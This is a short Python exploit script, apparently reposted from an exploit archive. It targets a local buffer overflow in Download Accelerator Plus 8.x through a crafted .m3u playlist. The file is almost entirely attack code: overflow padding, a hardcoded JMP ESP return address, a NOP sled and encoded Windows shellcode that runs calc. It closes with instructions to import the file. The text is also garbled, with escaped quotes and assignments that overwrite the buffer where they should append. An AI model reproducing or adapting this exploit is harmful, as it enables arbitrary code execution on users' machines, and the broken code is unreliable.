Download Accelerator Plus – DAP 8.x (m3u) Local BOF Exploit 0day

#!/usr/bin/python

# Download Accelerator Plus – DAP 8.x (m3u) 0day Local Buffer Overflow Exploit

# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>

# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish

# Shellcode: Windows Execute Command (calc)

# Just for fun ;]

##

from struct import pack

shellcode = (

"\\x6a\\x22\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x8d\\x6c\\xf6"

"\\xb2\\x83\\xeb\\xfc\\xe2\\xf4\\x71\\x84\\xb2\\xb2\\x8d\\x6c\\x7d\\xf7\\xb1\\xe7"

"\\x8a\\xb7\\xf5\\x6d\\x19\\x39\\xc2\\x74\\x7d\\xed\\xad\\x6d\\x1d\\xfb\\x06\\x58"

"\\x7d\\xb3\\x63\\x5d\\x36\\x2b\\x21\\xe8\\x36\\xc6\\x8a\\xad\\x3c\\xbf\\x8c\\xae"

"\\x1d\\x46\\xb6\\x38\\xd2\\xb6\\xf8\\x89\\x7d\\xed\\xa9\\x6d\\x1d\\xd4\\x06\\x60"

"\\xbd\\x39\\xd2\\x70\\xf7\\x59\\x06\\x70\\x7d\\xb3\\x66\\xe5\\xaa\\x96\\x89\\xaf"

"\\xc7\\x72\\xe9\\xe7\\xb6\\x82\\x08\\xac\\x8e\\xbe\\x06\\x2c\\xfa\\x39\\xfd\\x70"

"\\x5b\\x39\\xe5\\x64\\x1d\\xbb\\x06\\xec\\x46\\xb2\\x8d\\x6c\\x7d\\xda\\xb1\\x33"

"\\xc7\\x44\\xed\\x3a\\x7f\\x4a\\x0e\\xac\\x8d\\xe2\\xe5\\x9c\\x7c\\xb6\\xd2\\x04"

"\\x6e\\x4c\\x07\\x62\\xa1\\x4d\\x6a\\x0f\\x97\\xde\\xee\\x6c\\xf6\\xb2")

RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)

m3u = \’http://localhost/verify_me________________________________%s.mp3\’

buf = \’A\’ * 14074

buf = pack(\'<L\’, RET)

buf = \’\\x90\’ * 32

buf = shellcode

m3u %= buf

fd = open(\’evil.m3u\’, \’wb\’)

fd.write(m3u)

fd.close()

print \’DONE, import the evil.m3u and click "Verify"\’

# EoF